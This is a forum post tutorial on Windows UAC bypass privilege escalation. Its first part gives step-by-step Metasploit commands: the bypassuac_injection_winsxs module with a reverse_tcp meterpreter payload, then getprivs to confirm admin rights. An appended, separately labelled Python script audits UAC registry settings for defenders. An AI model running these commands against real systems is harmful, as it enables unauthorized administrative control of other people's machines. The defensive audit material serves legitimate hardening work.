MITRE ATT&CK - UAC Bypass Privilege Escalation


Post by ltx_Lazzarus » Mon Apr 22, 2024 8:12 am

This whole "privilege escalation" thing can be a real beaut for snagging some top-shelf permissions on the ol' system or network. Sometimes, ya can just waltz right in with a basic pass, but to really get the job done, you need to be packing some serious clout.
The way I see it, the most common ways to pull this off are by finding the weak spots, the dodgy setups, and the downright vulnerabilities in the system.
---------------------------------------------------------
Privilege Escalation on Windows:
Our goal here is to get a bit more juice on those Windows systems we're working with. We're talking about elevating our privileges.
---------------------------------------------------------
Requirements:
- Kali Linux or Parrot OS

UAC BYPASS
If you're looking to get a bit more clout on the system, you can try bypassing that whole User Account Control (UAC) business. See, Windows has this thing called UAC that lets programs boost their permissions, from low to high, to do their thing. But sometimes, you can skip past that whole user confirmation rigmarole and just get the job done.

Did you know Metasploit's got a bunch of handy dandy modules for bypassing that whole User Account Control (UAC) business? Reckon we can use those to really boost our permissions on those Windows 7 and Windows 10 systems.

Code:

meterpreter> background

To get the ball rolling, all you gotta do is run a quick search. Just fire up that terminal and type:

Code:

msf> search bypassuac

After having a gander at the options, it looks like the "bypassuac_injection_winsxs" module is the way to go for us. See, it's the only one that's been proven to work a treat on those Windows 10 systems:

Load the UAC bypass module by typing this command:

Code:

msf> use exploit/windows/local/bypassuac_injection_winsxs

Now that we've got that UAC bypass module all loaded up, it's time to get it configured just right. We'll need to run a few quick commands to make sure everything's shipshape:

Code:

msf> set payload windows/x64/meterpreter/reverse_tcp
msf> set target Windows x64
msf> set SESSION <SESSION-ID>

We've got the module all set up. To execute it, type:

Code:

msf> run

If all went according to plan, we should be seeing an elevated meterpreter session on that target system:

Let's take a quick peek under the hood and see what kind of permissions we're rocking with this elevated session. We can do that by running a simple command in the meterpreter:

Code:

meterpreter> getprivs

Turns out we've got the whole kit and caboodle - administrative privileges.
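From the defender's side, the post's point that UAC can elevate without asking the user comes down to a handful of policy values. The script below is an added example, not part of the original post: it audits the output of `reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"` and flags settings that allow elevation with no prompt. The sample output and the function names are constructed for illustration.

```python
import re

# Constructed sample of `reg query` output for the UAC policy key (not from the post).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    EnableLUA    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1
    FilterAdministratorToken    REG_DWORD    0x0
"""

VALUE_RE = re.compile(r"^[ \t]+(\w+)[ \t]+REG_DWORD[ \t]+(0x[0-9a-fA-F]+)[ \t]*$", re.M)


def parse_reg_dwords(text):
    """Return {value_name: int} for every REG_DWORD line in reg query output."""
    return {name: int(raw, 16) for name, raw in VALUE_RE.findall(text)}


def audit_uac(values):
    """Return a list of findings; an empty list means every elevation prompts."""
    findings = []
    # Values missing from the key fall back to the Windows defaults.
    if values.get("EnableLUA", 1) != 1:
        findings.append("EnableLUA is off: UAC is disabled for administrators")
    consent = values.get("ConsentPromptBehaviorAdmin", 5)
    if consent == 0:
        findings.append("ConsentPromptBehaviorAdmin=0: elevation never prompts")
    elif consent == 5:
        findings.append("ConsentPromptBehaviorAdmin=5: Windows binaries "
                        "auto-elevate without a prompt; set 2 (Always notify)")
    if values.get("PromptOnSecureDesktop", 1) != 1:
        findings.append("PromptOnSecureDesktop is off: prompts are shown "
                        "on the user's interactive desktop")
    return findings


def audit_reg_output(text):
    """Parse raw reg query text and audit it in one step."""
    return audit_uac(parse_reg_dwords(text))


if __name__ == "__main__":
    for line in audit_reg_output(SAMPLE_REG_QUERY) or ["Every elevation prompts"]:
        print(line)
```

Running day-to-day work from a standard (non-administrator) account removes the auto-elevation path altogether, since elevation then requires administrator credentials.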